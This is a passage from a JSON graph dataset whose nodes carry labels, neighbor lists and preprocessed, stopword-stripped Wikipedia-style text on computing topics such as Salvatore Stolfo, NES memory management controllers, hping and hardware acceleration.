      2222,
      847,
      3951,
      7983,
      10737,
      2456,
      4412
    ],
    "mask": "None"
  },
  {
    "node_id": 11473,
    "label": 4,
    "text": "Salvatore_J._Stolfo:salvatore j. stolfo salvatore j. stolfo tenured professor computer science columbia university new york leading expert computer security known research machine learning applied computer security intrusion detection systems anomaly detection algorithms systems fraud detection parallel computing born brooklyn new york stolfo received bachelor science degree computer science mathematics brooklyn college 1974 received ph.d. nyu courant institute 1979 faculty columbia ever since ’ taught courses artificial intelligence intrusion anomaly detection systems introduction programming fundamental algorithms data structures knowledge-based expert systems columbia stolfo received close 50m funding research broadly focused security intrusion detection anomaly detection machine learning includes early work parallel computing artificial intelligence published co-authored 250 papers 21,000 citations h-index 67 pioneered research number areas within computer security widely use today 1996 proposed project darpa applies machine learning behavioral patterns detect fraud intrusion networks approach security recently emerged within industry user behavior analytics earlier research machine learning algorithms applied credit card fraud adopted throughout financial industry stolfo students dan miranker mike van biema alexander pasik steve taylor designed architecture software systems dado parallel computer example fifth generation computer sponsored darpa high performance parallel computing initiative mid-1980s dado research group designed built lab columbia university fully functional 1023-processor version machine first parallel machine providing large-scale commercial speech recognition services dado occupied 2 cubic feet cabinet space dado tested sea navy research vessel test capabilities related acoustic analyses detection capabilities parallel broadcast resolve/report function introduced dado machine apparently influenced part design ibm blue gene parallel computer dado technology first invention claimed columbia university ownership faculty member intellectual property 1980 bayh-dole act company called fifth generation computer formed columbia outside investors commercialize dado machine company subsequently developed commercially deployed speech recognition system operated qwest dispute small company large telecommunications provider columbia university caused six-year detour us court system ultimately stolfo prevailed dado introduced parallel computing primitive “ broadcast resolve report ” hardwire implemented mechanism today called mapreduce among earliest work stolfo along colleague greg vesonder bell labs developed large-scale expert data analysis system called ace automated cable expertise nation phone system bell labs distributed ace number telephone wire centers improve management scheduling repairs local loop ace likely first system combine rule-based inference ai expert system relational database management system cras system serves model deductive data base systems subject matter research many years database community ace first expert system kind commercialized widely distributed work related merge/purge problem sometimes referred “ record linkage ” “ data deduplication ” algorithm developed student mauricio hernandez used large-scale commercial systems data cleansing identifying purging duplicates large data sets important part large-scale data analysis systems especially commercial data analytics algorithms invented provided means scaling large data sets balancing requirement produce accurate results presence arbitrary noise error data base patented technology licensed informix company later acquired ibm darpa ids evaluation datasets constructed lincoln labs 1998 1999 darpa cyber panel program network trace data sets used evaluate performance different intrusion detection systems network trace data ground truth available open research community data however difficult use directly wider community data mining researchers stolfo associates ids lab including wenke lee created kdd cup dataset derived darpa ids datasets darpa network trace data converted connection records making data suitable data mining researchers test various machine learning algorithms data created community service extensively used ids research even today stolfo consulted cto citibank several years conducted research machine learning algorithms applied credit card fraud problem much work students phil chan andreas prodromidis published meta-learning based strategies demonstrated improve accuracy fraud detectors substantially reduce loss due fraud stolfo early proponent collaborative security distributed ids technology systems stolfo students ke wang janek parehk developed fully functional ids alert exchange system introduced new means sharing sensitive data privacy-preserving manner technique involved communicating network packet content found anomalous verified attack converting raw packet content statistical representation allowing accurate correlation common attacks across sites method invented stolfo students share correlate content across administrative domains without disclosing sensitive information introduced use bloom filters storing n-gram content network packet datagrams method extensively studied continues used several ongoing experiments method also formed basis recent project colleagues steve bellovin tal malkin secure querying encrypted document databases without requiring insecure decryption document searching relevant content stolfo coined term fog computing confused fog computing technology used “ launch disinformation attacks malicious insiders preventing distinguishing real sensitive customer data fake worthless data. ” stolfo ’ proposed approach confuse confound traitor leveraging uncertainty reduce knowledge ordinarily systems data gain access without authorization fog computing systems integrate bait information systems generate alerts decoy misused 2005 stolfo received funding army research office conduct workshop bring together group researchers help identify research program focus insider threats since ids group columbia working researchers i3p developed several demonstration systems evidence insider malfeasance work includes user profiling techniques especially masquerader detection ruu spoken acronym studied stolfo student malek ben salem number decoy generation facilities studied jointly co-pi angelos keromytis student brian bowen emt system sponsored darpa contracts among first machine learning system incorporate social network analyses important security problems including spam detection virus propagation extensive set analyses emt developed stolfo student shlomo herskhop others allowed analysts forensics experts students researchers opportunity explore large corpora bail messages discover wide range important derivative knowledge communication dynamics user organization among applications emt models user behavior identify uncharacteristic bail flows indicative spam bots viral propagations toolkit downloaded well 100 users elements analyses introduced emt serve model analytical systems entire body analyses demonstrated general description ids network communication analysis systems conveniently described acronym cv5 student ang cui working stolfo ids lab invented concept embed arbitrary code legacy embedded devices symbiotic embedded machine technology demonstrated provide direct means inject security features operational cisco ios routers situ without significant performance degradation without negative impact routers primary function symbiote technology explored use number different platforms devices arm mips x86 several interesting applications especially large set existing insecure embedded devices found internet line work supported darpa crash program brought together large number computer science researchers focused clean slate design new generation safe secure computer systems preliminary work performed cui stolfo ids lab performed wide area scan internet counting number vulnerable devices date 1.1 million found founded 2011 red balloon security rbs cyber security company founded dr sal stolfo dr ang cui spinout ids lab rbs developed symbiote technology called frak host defense embedded systems sponsorship darpa cyber fast track program frak system provides core capability automatically unpack modify repack embedded system firmware install symbiote defenses currently developing products services based upon software symbiote technology created based ids lab research darpa active authentication anomaly detection multiple scales program dr sal stolfo dr. angelos keromytis founded allure security technologies using active behavioral authentication decoy technology stolfo pioneered patented 1996 allure brought technologies together novo active user behavior analytics security solution protects devices data loss intrusion allure ’ research supported columbia university national science foundation darpa dhs others founded 2009 allure security technology created based work done darpa sponsorship columbia ’ ids lab based darpa prompts research detect hackers inside organization perimeter continuously authenticate user without password electronic digital documents stolfo ’ company electronic digital documents produced “ datablade ” technology informix marketed strategy acquisition development mid 80 ’ stolfo ’ patented merge/purge technology called edd datacleanser datablade licensed informix since acquisition ibm 2005 ibm informix one world ’ widely used database servers users ranging world ’ largest corporations startups system detection one companies founded prof. stolfo commercialize anomaly detection technology developed ids lab company ultimately reorganized rebranded trusted computer solutions company recently acquired raytheon 2013 washington post interviewed dr. stolfo technology uses decoy data mislead hackers product soon vended allure security technology 2013 new york times reported dr. stolfo advisee ang cui intercepted operating system cisco ’ voip phones order spy remotely enabling transcribe conversations using google ’ voice-to-text translation 2012 scientific american covered pair ’ new “ symbiote ” program would detect invasions firmware code without slowing computer ’ speed 2011 adviser ang cui staged intrusion university printers nbc news interviewed stolfo topic cyber security",
    "neighbors": [
      6850,
      7234,
      4964,
      7464,
      3433,
      9964,
      11343,
      499,
      1783,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11474,
    "label": 1,
    "text": "Multimedia_database:multimedia database multimedia database mmdb collection related multimedia data multimedia data include one primary media data types text images graphic objects including drawings sketches illustrations animation sequences audio video multimedia database management system mmdbms framework manages different types data potentially represented wide diversity formats wide array media sources provides support multimedia data types facilitate creation storage access query control multimedia database multimedia database mmdb hosts one multimedia data types i.e text images graphic objects audio video animation sequences data types broadly categorized three classes additionally multimedia database mmdb needs manage additional information pertaining actual multimedia data information following last three types called metadata describe several different aspects media data media keyword data media feature data used indices searching purpose media format data used present retrieved information like traditional databases multimedia databases address following requirements multimedia databases ability uniformly query data media data textual data represented different formats ability simultaneously query different media sources conduct classical database operations across query support ability retrieve media objects local storage device good manner storage support ability take response generated query develop presentation response terms audio-visual media ability deliver presentation presentation delivery support examples multimedia database application areas",
    "neighbors": [
      9345,
      6406,
      10909,
      7599,
      7983,
      8122,
      9926,
      1480,
      3529,
      9932,
      2901,
      6102,
      731,
      1890,
      9710,
      3698,
      6131,
      9714,
      2294,
      5880,
      5373,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 11475,
    "label": 9,
    "text": "Stratego/XT:stratego/xt stratego/xt language toolset constructing stand-alone program transformation systems combines stratego transformation language xt toolset transformation components providing framework constructing stand-alone program transformation systems stratego language based programming paradigm called strategic term rewriting provides rewrite rules expressing basic transformation steps application rules controlled using strategies form subroutines xt toolset provides reusable transformation components declarative languages deriving new components parsing grammars using modular syntax definition formalism sdf implementing pretty-printing program transformations often operate modifying abstract syntax tree ast stratego also possible specify transformations using concrete syntax allows programmers express transformation using familiar often concise syntax object programming language internally still operates ast rule desugar do-while statement java rule using concrete syntax theoretical framework stratego called system first described paper eelco visser zine-el-abidine benaissa",
    "neighbors": [
      10435,
      932,
      4293,
      2374,
      4519,
      2537,
      10474,
      6797,
      7983,
      4980,
      5492,
      823,
      5399,
      605
    ],
    "mask": "None"
  },
  {
    "node_id": 11476,
    "label": 4,
    "text": "International_Multilateral_Partnership_Against_Cyber_Threats:international multilateral partnership cyber threats international multilateral partnership cyber threats impact first united nations-backed cybersecurity alliance since 2011 impact serves key partner united nations un specialised agency icts international telecommunication union itu first comprehensive public-private partnership cyber threats impact serves politically neutral global platform brings together governments world industry academia enhance global community capabilities dealing cyber threats total 152 countries formally part itu-impact coalition strong support industry giants partners academia international organizations impact largest cybersecurity alliance kind headquartered cyberjaya malaysia impact operational home itu global cybersecurity agenda gca impact offers itu member states access expertise facilities resources effectively address cyber threats well assisting united nations agencies protecting ict infrastructures impact initiative first announced fifth prime minister malaysia closing ceremony 15th world congress information technology wcit 2006 held austin texas united states initially impact known 'international multilateral partnership cyber-terrorism 2008 following feedback member governments also impact international advisory board iab impact official launch world cyber security summit 2008 wcss words 'cyber terrorism impact name changed 'cyber threats reflect wider cybersecurity role impact global headquarters inaugurated 20 may 2009 built 28,400 square metre site seven-acre site built-up area 5,400 square metres 58,000 square feet modelled centers disease control prevention cdc atlanta united states impact operates global response centre grc nerve centre impact grc fully equipped crisis room communications facilities fully functional security operations centre soc well-equipped data centre on-site broadcasting centre vip viewing gallery grc involved securing objectives itu global cybersecurity agenda gca placing technical measures combat newly evolved cyber threats inauguration impact global headquarters prime minister malaysia secretary-general international telecommunication union impact global headquarters officially declared open 20 may 2009 5th prime minister malaysia tun abdullah bin ahmad badawi witnessed prime minister malaysia dato sri mohd najib bin tun abdul razak secretary-general itu hamadoun touré impact chairman datuk mohd noor amin grc impact provides global community network early warnings system news expert locator team management remediation automated threat analysis system trend libraries visualisation global threats country-specific threats incident case management trend monitoring analysis knowledge base reporting resolution finder among others impact formally became key partner itu united nations ’ un specialised agency following cooperation agreement signed world summit information society 2011 wsis forum geneva may 2011 cooperation agreement impact tasked itu responsibility providing cybersecurity assistance support itu 193 member states also organisations within un system memorandum agreement officially signed hamadoun touré secretary-general itu datuk mohd noor amin chairman impact itu head office geneva founded 1865 itu oldest organisation within un system functions un specialised agency information communication technologies impact involvement itu began 2008 named physical home itu global cybersecurity agenda gca gca international cybersecurity framework formulated following deliberations 100 leading experts worldwide gca contains many recommendations adopted implemented intended provide improved global cybersecurity memorandum understanding inked bangkok back 2008 impact named physical operational home gca addition 2011 wsis forum memorandum understanding mou signed itu united nations office drugs crime unodc see impact supporting organisations collaboration assist un member states mitigate risks posed cybercrime partner countries itu-impact also given access host specialised services including monitoring analysis alerts cyber threats impact global response centre grc acts global cyber threat resource centre provides emergency responses facilitate identification cyber threats sharing resources assist itu-unodc member states impact global response centre grc collaborates industry academia hosts comprehensive database cyber threats impact electronically secure collaborative application platform experts escape designed connect responsible cybersecurity 140 countries also provides response mechanism itu-impact partner countries three divisions within impact centre policy international cooperation centre training skills development centre security assurance research divisions provide consulting training services scholarships reports expertise governments industry academia partner countries international advisory board iab members included past members include vinton g. cerf vice president chief internet evangelist google howard schmidt former white house cyber security coordinator obama bush administrations united states america mikko hyppönen chief research officer f-secure john w. thompson former chairman board symantec corporation ayman hariri chairman oger systems advisory board management team consists mohd noor amin chairman management board mohamed shihab advisor technical mohamed zaini bin mazlan advisor administration anuj singh chief operating officer coo phillip victor director policy international cooperation mohamad sazly musa director security assurance",
    "neighbors": [
      9375,
      7809,
      7522,
      9537,
      9569,
      10437,
      11213,
      2451,
      9246,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 11477,
    "label": 2,
    "text": "Memory_management_controller:memory management controller multi-memory controllers memory management controllers mmc different kinds special chips designed various video game developers use nintendo entertainment system nes cartridges chips extend capabilities original console make possible create nes games features original console offer alone basic nes hardware supports 40k rom total 32k prg 8k chr thus single tile sprite table possible limit rapidly reached within famicom first two years market game developers began requesting way expand console capabilities chips also known mappers cnrom earliest banking hardware introduced famicom appearing early 1986 consists single 7400 series discrete logic chip cnrom supports single fixed prg bank eight chr banks 96k total rom third party variations supported additional capabilities many cnrom games store game level data chr rom blank screen reading early nes mappers composed 7400 series discrete logic chips unrom appeared late 1986 supports single fixed 16k prg bank rest prg switchable instead dedicated rom chip hold graphics data called chr nintendo games using unrom store graphics data program rom copy ram cartridge run time mmc1 nintendo first custom mmc integrated circuit incorporate support saved games multi-directional scrolling configurations chip comes least five different versions mmc1a mmc1b1 mmc1b2 mmc1b3 mmc1c differences different versions slight mostly owing savegame memory protection behavior mmc1 chip allows switching different memory banks program rom selected 16kb 32kb chunks character rom selected 4kb 8kb chunks unusual feature memory controller input serial rather parallel 5 sequential writes bit shifting needed send command circuit mmc2 used mike tyson punch-out later rerelease replaced mike tyson single 8kb bank program rom selected remaining 24kb locked character rom selected two pairs 4kb banks would automatically switched video hardware attempts load particular graphic tiles memory thus allowing larger amount graphics used screen without need game manually switch mmc3 introduced 1988 adds irq timer allow split screen scrolling without sacrifice sprite 0 along two selectable 8kb program rom banks two 2kb+four 1kb selectable character rom banks allows easy instant swapping sprite tile data 8k save game ram supported chip used three games released famicom japan developed intelligent systems functionally nearly identical mmc2 difference mmc4 switches program rom 16kb banks instead 8kb banks support battery-backed sram save game data mmc5 nintendo advanced mmc originally also expensive koei used chip regularly similar konami vrc6 interrupt handling works differently chip 1kb extra ram two extra square wave sound channels one extra pcm sound channel support vertical split screen scrolling improved graphics capabilities making 16,384 different tiles available per screen rather 256 allowing individual 8x8-pixel background tile color assignment instead restricted one color set per 2x2 tile group highly configurable program rom character rom bank switching scanline-based irq counter mmc5 supports 2mb total rom however commercially released game exceeded 1mb mmc6 similar mmc3 additional 1 kb ram saved battery backup famicom disk system asic extended audio chip supports one channel single-cycle 6-bit × 64 step wavetable-lookup synthesis built phase modulator pm sound generation similar frequency modulation synthesis a*rom mmc named amrom anrom aorom cartridge boards use developed chris stamper rare manufactured nintendo found games developed rare nintendo tradewest gametek acclaim milton bradley allows prg rom switched single 32k piece uses chr ram 256k total rom unlike chips uses one screen mirroring nintendo maintained tight control internationally-released cartridge hardware allow third parties use pcbs mappers remained case late nes commercial lifespan restrictions eased thus third party mappers found famicom unlicensed cartridges vrc2 chip konami allows program rom switched 8kb banks character rom switched 1kb banks mmc two known revisions vrc2a vrc2b exclusively used japanese version salamander vrc6 virtual rom controller advanced mmc chip konami supporting bank switching program code graphics well cpu cycle–based irq counter also act scanline counter chip also contains support three extra sound channels two square waves eight duty cycles one sawtooth wave used akumajō densetsu japanese version western version uses mmc5 nintendo since nintendo entertainment system allow cartridges add additional sound channels famicom version soundtrack reworked follow specifications thus soundtrack western version implemented five sound channels built stock nes vrc7 advanced mmc chip konami supporting bank switching irq counting equivalent vrc6 also containing ym2413 derivative providing 6 channels fm synthesis audio advanced audio used famicom game lagrange point japanese version tiny toon adventures 2 also used vrc7 make use extended audio 163 used games exclusive japan capabilities little better nintendo mmc3 variant contained extra sound hardware plays 4-bit wave samples supports 1 8 extra sound channels audible aliasing appears sufficiently large number channels enabled fme-7 memory mapping circuit developed sunsoft use nes famicom cartridges switches program rom 8kb banks switches character rom 1kb banks also contains hardware generate irq signals specified number cpu clock cycles thus achieving split-screen effects minimal use processing power special version mmc labeled sunsoft 5b rather fme-7 contains version widely used yamaha ym2149 sound generation hardware used one famicom title gimmick individual homebrew unlicensed developers made custom mmcs nes simply expand available memory 228 simple bank switching mmc developed use games action 52 cheetahmen ii nametable control bit action 52 multicart also contains small 16-bit register area contains old menu selection exiting game",
    "neighbors": [
      10855,
      3272,
      9417,
      204,
      8492,
      11564,
      1679,
      400,
      10833,
      4690,
      11380,
      3256,
      4698,
      3325,
      1566,
      9247
    ],
    "mask": "Test"
  },
  {
    "node_id": 11478,
    "label": 3,
    "text": "Konami's_Ping_Pong:konami ping pong konami ping pong sports arcade game created 1985 konami game notable first video game accurately reflect gameplay table tennis opposed earlier simplifications like pong konami titles time ported several 8-bit computer systems video game consoles konami ping pong played singleplayer multiplayer using 11 point scoring rules first player attain score 11 higher leading two points wins game maximum 14-14 point next point wins player must win best two three games order beat match playfield shown isometric perspective players shown disembodied hands players placed far-side table find hitting ball much difficult however player always positioned near side single player mode essential moves represented forehand backhand lob smash game features penguin protagonist konami earlier title antarctic adventure title screen member audience game penguin would later known penta introductory animation pingpong ball bounces along table finally hits penta head appears faint 1985 game released konami msx computers 1986 game ported amstrad cpc commodore 64 zx spectrum imagine software bernie duggs name ping pong apart scaled-down graphics sound due limited system capabilities ports perfectly replicate arcade gameplay 1987 game ported famicom disk system smash ping pong published nintendo nintendo character donkey kong jr. replaces konami penta crowd diskun famicom disk system mascot also replaces pentarou title screen later re-released wii virtual console japan pal region latter got import game title smash table tennis smash ping pong slated release nintendo 3ds may feature camera support 3d support analog support release featured amongst games nintendo entertainment system super nes released 3ds tech demo called classic games e3 2010 konami ping pong made available microsoft game room service xbox 360 console windows-based pcs june 2010",
    "neighbors": [
      10931,
      6797,
      9006,
      8887
    ],
    "mask": "Train"
  },
  {
    "node_id": 11479,
    "label": 0,
    "text": "Argument_mining:argument mining argument mining argumentation mining research area within natural-language processing field goal argument mining automatic extraction identification argumentative structures natural language text aid computer programs argumentative structures include premise conclusions argument scheme relationship main subsidiary argument main counter-argument within discourse argument mining workshop series main research forum argument mining related research argument mining applied many different genres including qualitative assessment social media content e.g twitter facebook provides powerful tool policy-makers researchers social political sciences domains include legal documents product reviews scientific articles online debates newspaper articles dialogical domains given wide variety text genres different research perspectives approaches difficult reach common objective evaluation scheme many annotated data sets proposed gaining popularity consensual data set yet found annotating argumentative structures highly demanding task successful attempts delegate annotation tasks crowd process still requires lot effort carries significant cost initial attempts bypass hurdle made using weak supervision approach",
    "neighbors": [
      1890,
      7780
    ],
    "mask": "Test"
  },
  {
    "node_id": 11480,
    "label": 4,
    "text": "Adaptive_Redaction:adaptive redaction adaptive redaction intelligent version redaction whereby sensitive parts document automatically removed based policy primarily used next generation data loss prevention dlp solutions policy set rules based content context context include content 'visible information see screen also 'invisible information document properties revision history also 'active content embedded electronic document macro adaptive redaction designed alleviate false positive events created data loss prevention software dlp security solutions false positives occur dlp policy triggers prevents legitimate outgoing communication majority cases caused oversight sender sending unprotected credit card information outside organization breaches payment card industry data security standard pci dss regulations many organizations accept credit card information email however reply email containing information would send prohibited information would cause breach policy adaptive redaction used remove credit card number allow email sent 'invisible information found documents created embarrassment several governments",
    "neighbors": [
      10245
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11481,
    "label": 2,
    "text": "Grml:grml grml operating system based debian designed run mainly live cd made run usb flash drive grml aims well-suited system administrators sysadmin users text tools includes x window system server minimalist window managers wmii fluxbox openbox use graphical programs like mozilla firefox included distribution addition sysadmin tools security network related software data recovery forensic tools editors shells many text tools included grml distribution focuses accessibility providing kernel support speakup software like brltty emacspeak flite another feature grml use z shell zsh default login shell customized zsh configuration used grml retrieved project repository since early 2009 grml isos come miros bsd4grml minimal miros bsd flavour release grml “ lackdose-allergie ” 2009.05 daily isos later releases grml “ hello-wien ” 2009.10 use manifold-boot technology provide isos written directly usb stick cf/sd card hard disc etc immediately bootable since grml 2010.12 isolinux loader used cases default providing consistent menu",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      6333,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      5078,
      9693,
      2786,
      2914,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 11482,
    "label": 7,
    "text": "Dropmyemail:dropmyemail dropmyemail cloud-based email backup software offered dropmysite offers cloud storage online backup software brief dropmyemail allows users automatically backup emails cloud option view migrate restore whenever required via web browser dropmyemail shown 1 march 2012 demo asia dropmysite dropmyemail concept conceived founder john fearon site launched 1 march 2012 demo asia launchpad emerging technology singapore dropmyemail 525,000 users growing rate faster twitter dropbox pininterest time launch dropmyemail moved away freemium business model free trial-based business model dropmyemail changed business model provide 15-day free trial followed paid account 10 per year 5gb account 20 10gb account 70 50gb account november 21 2012 dropmyemail launched business offering soho smb per email mailbox price plans provide 15-day free trial 100 seats followed paid account 5 seats 99.99 per year 20 seats 299.99 per year 100 seats 999.90 per year company launched affiliate program december 13 2012 meet demands various websites resell dropmyemail service dropmyemail web-based solution dropmyemail backend written ruby rails hosted amazon web services cloud infrastructure email platforms gmail hotmail yahoo etc supported dropmyemail users also backup email via imap pop settings dropmyemail uses amazon s3 storage system store files",
    "neighbors": [
      11201,
      6565,
      3870,
      7248,
      4623,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 11483,
    "label": 7,
    "text": "Red_Hook_Wi-Fi:red hook wi-fi red hook wi-fi free-to-use wi-fi mesh network provides free internet access red hook neighborhood brooklyn new york operated red hook initiative due location red hook brooklyn red hook channel buttermilk channel many residents face various challenges accessing broadband service.. survey found many people area accessed internet primarily mobile phones 30 population broadband access home beginning fall 2011 red hook initiative rhi brooklyn non-profit approached open technology institute collaborating community wireless network rhi wanted way communicate residents immediately around community center network initially launched support 150 simultaneous users ran open-software platform called commotion 2012 hurricane sandy struck area many internet communication systems throughout much city red hook remained connected mesh network headquarters red hook initiative became hub volunteer coordination donation collections food distribution residents came red hook initiative office charge devices connect internet shortly afterwards federal emergency management agency fema connected red hook wi-fi satellite system linking residents red cross communication matrix could used find emergency relief food banks well shelter locations relief efforts finished team led red hook initiative continued make improvements mesh network installing nano stations powered solar panels rooftops around red hook neighborhood though red hook wi-fi project already works hurricane sandy struck gained additional media attention storm 2015 red hook wi-fi selected part city resiliency initiative — group 27 finalists competing resiliency innovations stronger economy",
    "neighbors": [
      3016,
      9098,
      10021
    ],
    "mask": "None"
  },
  {
    "node_id": 11484,
    "label": 3,
    "text": "PAC418:pac418 socket pac418 418 pin microprocessor socket designed interface intel itanium processor rest computer usually via motherboard provides electrical interface well physical support socket designed support microprocessor module socket pac418 introduced intel first generation itanium 2001 supported bus speeds 133 mhz double-pumped socket pac418 processors reach speeds 800 mhz",
    "neighbors": [
      3588,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      7134,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 11485,
    "label": 5,
    "text": "X-Video_Bitstream_Acceleration:x-video bitstream acceleration x-video bitstream acceleration xvba designed amd graphics radeon gpu fusion apu arbitrary extension x video extension xv x window system linux operating-systems xvba api allows video programs offload portions video decoding process gpu video-hardware currently portions designed offloaded xvba onto gpu currently motion compensation mc inverse discrete cosine transform idct variable-length decoding vld mpeg-2 mpeg-4 asp mpeg-4 part 2 including xvid older divx nero digital mpeg-4 avc h.264 wmv3 vc-1 encoded video xvba direct competitor nvidia video decode presentation api unix vdpau intel video acceleration api va api november 2009 xvba backend video acceleration api va api released means software supports va api also support xvba 24 february 2011 official xvba sdk software development kit publicly released alongside suite open source tools amd hardware video gpu capable xvba video acceleration requires x11 software device driver enable features currently amd ati radeon graphics cards hardware support unified video decoder version 2.0 later primarily radeon hd 4000 series later supported proprietary ati catalyst device driver",
    "neighbors": [
      3586,
      3204,
      9223,
      6797,
      7309,
      2850,
      8995,
      10658,
      429,
      6705,
      3764,
      823,
      1480,
      11080,
      1377,
      1510,
      1770,
      5867,
      876,
      1644,
      8682,
      8438,
      2935,
      11130,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 11486,
    "label": 4,
    "text": "Hping:hping hping free packet generator analyzer tcp/ip protocol distributed salvatore sanfilippo also known antirez one type tester network security one de facto tools security auditing testing firewalls networks used exploit idle scan scanning technique also invented hping author implemented nmap security scanner new version hping hping3 scriptable using tcl language implements engine string based human readable description tcp/ip packets programmer write scripts related low level tcp/ip packet manipulation analysis short time like tools used computer security hping useful system administrators hackers",
    "neighbors": [
      3169,
      8998,
      2569,
      5612,
      11006,
      7983,
      1200,
      2739,
      692,
      5045,
      7031,
      5657,
      4956,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11487,
    "label": 3,
    "text": "Hardware_acceleration:hardware acceleration computing hardware acceleration use computer hardware specially made perform functions efficiently possible software running general-purpose transformation data routine computed calculated purely software running generic cpu purely custom-made hardware mix operation computed faster application-specific hardware designed programmed compute operation specified software performed general-purpose computer processor approach advantages disadvantages implementation computing tasks hardware decrease latency increase throughput known hardware acceleration typical advantages software include rapid development leading faster times market lower non-recurring engineering costs heightened portability ease updating features patching bugs cost overhead compute general operations advantages hardware include speedup reduced power consumption lower latency increased parallelism bandwidth better utilization area functional components available integrated circuit cost lower ability update designs etched onto silicon higher costs functional verification times market hierarchy digital computing systems ranging general-purpose processors fully customized hardware tradeoff flexibility efficiency efficiency increasing orders magnitude given application implemented higher hierarchy hierarchy includes general-purpose processors cpus specialized processors gpus fixed-function implemented field-programmable gate arrays fpgas fixed-function implemented application-specific integrated circuit asics hardware acceleration advantageous performance practical functions fixed updates needed software solutions advent reprogrammable logic devices fpgas restriction hardware acceleration fully fixed algorithms eased since 2010 allowing hardware acceleration applied problem domains requiring modification algorithms processing control flow integrated circuits created perform arbitrary operations analog digital signals often computing signals digital interpreted binary number data computer hardware software operate information binary representation perform computing accomplished calculating boolean functions bits input outputting result output device downstream storage processing either software hardware compute computable function custom hardware offers higher performance per watt functions specified software hardware description languages hdls verilog vhdl model semantics software synthesize design netlist programmed fpga composed logic gates application-specific integrated circuit vast majority software-based computing occurs machines implementing von neumann architecture collectively known stored-program computers computer programs stored data executed processors typically one cpu cores processors must fetch decode instructions well data operands memory part instruction cycle execute instructions constituting software program relying common cache code data leads von neumann bottleneck fundamental limitation throughput software processors implementing von neumann architecture even modified harvard architecture instructions data separate caches memory hierarchy overhead decoding instruction opcodes multiplexing available execution units microprocessor microcontroller leading low circuit utilization intel hyper-threading technology provides simultaneous multithreading exploiting under-utilization available processor functional units instruction level parallelism different hardware threads hardware execution units general rely von neumann modified harvard architectures need perform instruction fetch decode steps instruction cycle incur stages overhead needed calculations specified register transfer level rtl hardware design time circuit area costs would incurred instruction fetch decoding stages reclaimed put uses reclamation saves time power circuit area computation reclaimed resources used increased parallel computation functions communication memory well increased input/output capabilities comes opportunity cost less general-purpose utility greater rtl customization hardware designs allows emerging architectures in-memory computing transport triggered architectures tta networks-on-chip noc benefit increased locality data execution context thereby reducing computing communication latency modules functional units custom hardware limited parallel processing capability area logic blocks available integrated circuit die therefore hardware much free offer massive parallelism software general-purpose processors offering possibility implementing parallel random-access machine pram model common build multicore manycore processing units microprocessor ip core schematics single fpga asic similarly specialized functional units composed parallel digital signal processing without embedded processor ip core therefore hardware acceleration often employed repetitive fixed tasks involving little conditional branching especially large amounts data nvidia cuda line gpus implemented device mobility increased relative performance specific acceleration protocols required new metricizations considering characteristics physical hardware dimensions power consumption operations throughput summarized three categories task efficiency implementation efficiency flexibility appropriate metrics consider area hardware along corresponding operations throughput energy consumed suppose wish compute sum formula_1 integers assuming large integers available codice_1 large enough hold sum done software specifying c++ constexpr int n 20 constexpr int two_to_the_n 1 « n bignum array_sum const std :array int two_to_the_n ints algorithm runs linear time formula_2 big notation hardware sufficient area chip calculation parallelized take 20 time steps using prefix sum algorithm algorithm requires logarithmic time formula_3 formula_4 space in-place algorithm parameter int n 20 parameter int two_to_the_n 1 « n function int array_sum endfunction example takes advantage greater parallel resources available application-specific hardware software general-purpose computing paradigms architectures hardware acceleration applied stream processing examples hardware acceleration include bit blit acceleration functionality graphics processing units gpus use memristors accelerating neural networks regular expression hardware acceleration spam control server industry intended prevent regular expression denial service redos attacks hardware performs acceleration may part general-purpose cpu separate unit second case referred hardware accelerator often specifically 3d accelerator cryptographic accelerator etc traditionally processors sequential instructions executed one one designed run general purpose algorithms controlled instruction fetch example moving temporary results register file hardware accelerators improve execution specific algorithm allowing greater concurrency specific datapaths temporary variables reducing overhead instruction control fetch-decode-execute cycle modern processors multi-core often feature parallel single-instruction multiple data simd units even hardware acceleration still yields benefits hardware acceleration suitable computation-intensive algorithm executed frequently task program depending upon granularity hardware acceleration vary small functional unit large functional block like motion estimation mpeg-2",
    "neighbors": [
      7173,
      9736,
      9739,
      9741,
      2066,
      7699,
      5655,
      6171,
      10781,
      2594,
      8231,
      10284,
      3629,
      7218,
      6716,
      2623,
      2113,
      7234,
      11333,
      3142,
      1614,
      2638,
      7252,
      3159,
      8795,
      2140,
      1122,
      4194,
      10853,
      3175,
      5223,
      5225,
      6762,
      5739,
      8810,
      4205,
      8301,
      8815,
      3698,
      630,
      6774,
      8822,
      7802,
      6268,
      9345,
      651,
      7313,
      3734,
      153,
      9371,
      10909,
      6815,
      8352,
      5793,
      2210,
      6818,
      4773,
      5798,
      6821,
      2731,
      7852,
      10924,
      9391,
      2224,
      3762,
      7858,
      9911,
      8890,
      10428,
      4286,
      2241,
      2754,
      2243,
      9926,
      11462,
      1736,
      4811,
      9932,
      5329,
      4308,
      10966,
      2264,
      2777,
      731,
      9443,
      5861,
      7911,
      10985,
      1770,
      5355,
      9964,
      5358,
      1776,
      8944,
      10483,
      757,
      2294,
      2805,
      5880,
      249,
      10485,
      8700,
      5373,
      6909,
      8447,
      1798,
      6406,
      1801,
      6926,
      6415,
      10512,
      785,
      1298,
      2838,
      2339,
      2852,
      4902,
      6950,
      2345,
      3886,
      7983,
      9006,
      309,
